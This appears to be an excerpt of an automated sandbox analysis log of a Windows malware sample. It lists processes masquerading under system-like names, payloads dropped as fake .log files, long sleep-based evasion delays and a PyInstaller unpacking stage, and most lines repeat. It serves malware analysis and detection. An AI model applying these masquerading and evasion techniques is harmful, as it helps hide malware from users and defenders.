                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exeMemory allocated: C80000 memory reserve | memory write watchJump to behavior
                          Source: C:\Chaindriver.exeMemory allocated: 1ACC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Chaindriver.exeMemory allocated: F40000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exeMemory allocated: 1AD50000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exeMemory allocated: AA0000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exeMemory allocated: 1A420000 memory reserve | memory write watch
                          Source: C:\Recovery\Memory Compression.exeMemory allocated: E40000 memory reserve | memory write watch
                          Source: C:\Recovery\Memory Compression.exeMemory allocated: 1A920000 memory reserve | memory write watch
                          Source: C:\Recovery\Memory Compression.exeMemory allocated: EA0000 memory reserve | memory write watch
                          Source: C:\Recovery\Memory Compression.exeMemory allocated: 1A9D0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeMemory allocated: 10C0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeMemory allocated: 1ACD0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeMemory allocated: 1020000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeMemory allocated: 1ACD0000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exeMemory allocated: F10000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exeMemory allocated: 1A700000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeMemory allocated: 10A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeMemory allocated: 1AD10000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Chaindriver.exeThread delayed: delay time: 922337203685477
                          Source: C:\Chaindriver.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeThread delayed: delay time: 922337203685477
                          Source: C:\Chaindriver.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\KGIrVxyv.logJump to dropped file
                          Source: C:\Chaindriver.exeDropped PE file which has not been started: C:\Users\user\Desktop\Zfmnrnxn.logJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\FnBzuKhI.logJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_lzma.pydJump to dropped file
                          Source: C:\Chaindriver.exeDropped PE file which has not been started: C:\Users\user\Desktop\PxTXHLsG.logJump to dropped file
                          Source: C:\Chaindriver.exeDropped PE file which has not been started: C:\Users\user\Desktop\viEjRGTv.logJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pydJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_bz2.pydJump to dropped file
                          Source: C:\Chaindriver.exeDropped PE file which has not been started: C:\Users\user\Desktop\HTKiXRcY.logJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_decimal.pydJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\TkRgFrOc.logJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_hashlib.pydJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\python39.dllJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\select.pydJump to dropped file
                          Source: C:\Recovery\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\BXpblVtN.logJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_socket.pydJump to dropped file
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17554
                          Source: C:\Chaindriver.exe TID: 7876Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Chaindriver.exe TID: 7648Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Chaindriver.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\Memory Compression.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\Memory Compression.exe TID: 7592Thread sleep time: -30000s >= -30000s
                          Source: C:\Recovery\Memory Compression.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe TID: 7532Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe TID: 7660Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Chaindriver.exe TID: 3288Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe TID: 8048Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Chaindriver.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Chaindriver.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Chaindriver.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Chaindriver.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED8D00 FindFirstFileExW,FindClose,0_2_00007FF652ED8D00
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF652EE8670
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF652EE8670
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF652EF26C4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C036407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C036407C
